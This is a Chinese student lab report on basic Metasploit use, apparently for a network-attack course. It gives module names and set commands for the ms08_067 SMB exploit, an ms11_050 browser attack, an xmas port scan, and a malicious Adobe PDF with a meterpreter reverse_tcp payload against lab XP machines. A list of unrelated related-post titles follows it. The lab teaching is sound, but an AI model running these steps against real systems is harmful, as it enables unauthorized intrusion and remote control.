MSF基础应用

一个主动攻击,如ms08_067

  • 启动msf

  • search ms08_067,查找相应的漏洞,查询可攻击的模块。

  • 根据上述漏洞的模块use exploit/windows/smb/ms08_067_netapi选择该模块

  • 接下来查看相应的攻击载荷,首先我们可以查看可使用的载荷

  • 想要获取靶机的shell,所以可以选择以上攻击载荷

  • 先查看 options 发现需要设置的信息

  • 设置攻击主机ip(LHOST)、远程主机ip(RHOST)以及设置相应平台的编号:set target 0

  • 发起渗透攻击,exploit,成功

一个针对浏览器的攻击,如ms11_050

  • 查找相关漏洞信息

  • 找到模块后,可以通过info指令查看模块详细信息

  • 设置如下信息

  • 在浏览器输入以下信息 http://192.168.11.128:8080/ms11050

  • 回头看 发现试了很多次

成功应用任何一个辅助模块——xmas

  • 一种更为隐蔽的扫描方式,通过发送FIN,PSH,URG标志能够躲避一些TCP标记检测器的过滤。

  • 端口扫描分为TCP SYN、TCP connect、秘密扫描、以及其他扫描,xmas属于端口扫描中的秘密扫描的一种。

  • 先查看需要设置的信息

  • 设置端口及RHOST,限制了端口1—100

  • run发现,open | filtered 无法确定端受限口是开放还是被防火墙设置成被过滤, 可能开放的端口不响应。

  • XMAS扫描原理和NULL扫描的类似,将TCP数据包中的ACK、FIN、RST、SYN、URG、PSH标志位置1后发送给目标主机。在目标端口开放的情况下,目标主机将不返回任何信息。

一个针对客户端的攻击,如Adobe

  • 首先设置显示隐藏文件夹

  • 输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

  • 使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

  • 设置 FILENAME 、LPORT、LHOST

  • 输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

  • 使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。设置相同的端口如上。

  • 使用命令exploit开始攻击,在xp中打开pdf。

  • 成功。第一次由于超时未响应,所以失败了。第二次就OK了。

  • 可在靶机中查看链接,发现连接信息。

实验后回答问题

  • 什么是exploit?

exploit就是背着payload去攻击,起到运载作用

  • 什么是payload?

payload则为攻击负荷

  • 什么是encode?

encode为编码器,使其得到伪装,防止被查杀,打掩护用到的。

实验总结与体会

老师我发誓我写了。。写着写着熄灯了,我还拍照留了证据当时。。因为我怕没保存上。。咋可能不写啊!!!

转载于:https://www.cnblogs.com/20145240lsj/p/6701563.html

20145240《网络对抗》MSF基础应用相关推荐

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 20155227《网络对抗》Exp5 MSF基础应用

    20155227<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode exploit:把实现设置好的东西送到要攻击的主机里. ...

  3. 《网络对抗》Exp5 MSF基础应用

    20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:渗透攻击的模块合集,将真正要负责攻 ...

  4. 2017-2018-2 20155314《网络对抗技术》Exp5 MSF基础应用

    2017-2018-2 20155314<网络对抗技术>Exp5 MSF基础应用 目录 实验内容 实验环境 基础问题回答 预备知识 实验步骤--基于Armitage的MSF自动化漏洞攻击实 ...

  5. 2019-2020-2 20175 212童皓桢《网络对抗技术》Exp6 MSF基础应用

    2019-2020-2 20175212童皓桢<网络对抗技术> Exp6 MSF基础应用 目录 1. 实验目标 2. 实验内容 2.1 主动攻击实践 2.2 针对浏览器的攻击 2.3 针对 ...

  6. 20145209刘一阳《网络对抗》实验五:MSF基础应用

    20145209刘一阳<网络对抗>实验五:MSF基础应用 主动攻击 首先,我们需要弄一个xp sp3 English系统的虚拟机,然后本次主动攻击就在我们kali和xp之间来完成. 然后我 ...

  7. 2018-2019-2 20165334『网络对抗技术』Exp5:MSF基础应用

    2018-2019-2 20165334『网络对抗技术』Exp5:MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  8. 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用

    实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...

  9. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

最新文章

  1. errorEruda解决移动端真机调试,bug收集问题
  2. centos7已有数据硬盘挂载_CentOS7如何添加硬盘和挂载硬盘
  3. LINUX下PHP安装VLD扩展并测试OK
  4. filebeat 乱码
  5. java ee 代码,JavaEE用户登录注册代码(免费)
  6. matlab做信号实验需要安装那些模块_无人机基于Matlab/Simulink的模型开发(连载一)...
  7. c语言仓库即存储器,计算机基础4
  8. IDEA与Maven Java普通项目
  9. Android 手写板SDK
  10. form表单提交大量input,php接收不全
  11. bp神经网络matlab feedfollownet,BP神经网络模型:Matlab
  12. prometheus + cadvisor + grafana 监控容器和服务器
  13. 最新版Ubuntu新建文档
  14. html5 JavaScript 邮箱地址验证
  15. 自动化连接远程服务器并执行指令
  16. 什么是反射、反射可以做些什么
  17. web自动化--python+selenium自动化
  18. 灯泡开关python
  19. 帆软报表开发学习笔记(八)
  20. 1970 matla 时间_在MATLAB中绘制时间序列数据

热门文章

  1. 天堂Lineage(單機版)從零開始架設教學
  2. 浏览器缓存导致FLASH资源更新问题的解决方案
  3. OpenCV 【四】————Watershed Algorithm(图像分割)——分水岭算法的原理及实现
  4. Linux文件,文件描述符以及dup()和dup2()
  5. linux的more 命令
  6. 看看大网站到底是如何保障网络安全的
  7. Web的桌面提醒(Popup)
  8. 朴素、Select、Poll和Epoll网络编程模型实现和分析——Select模型
  9. 【Qt】Qt样式表总结(一):选择器
  10. 2021暨南大学计算机考研,暨南大学2021广播电视专硕经验贴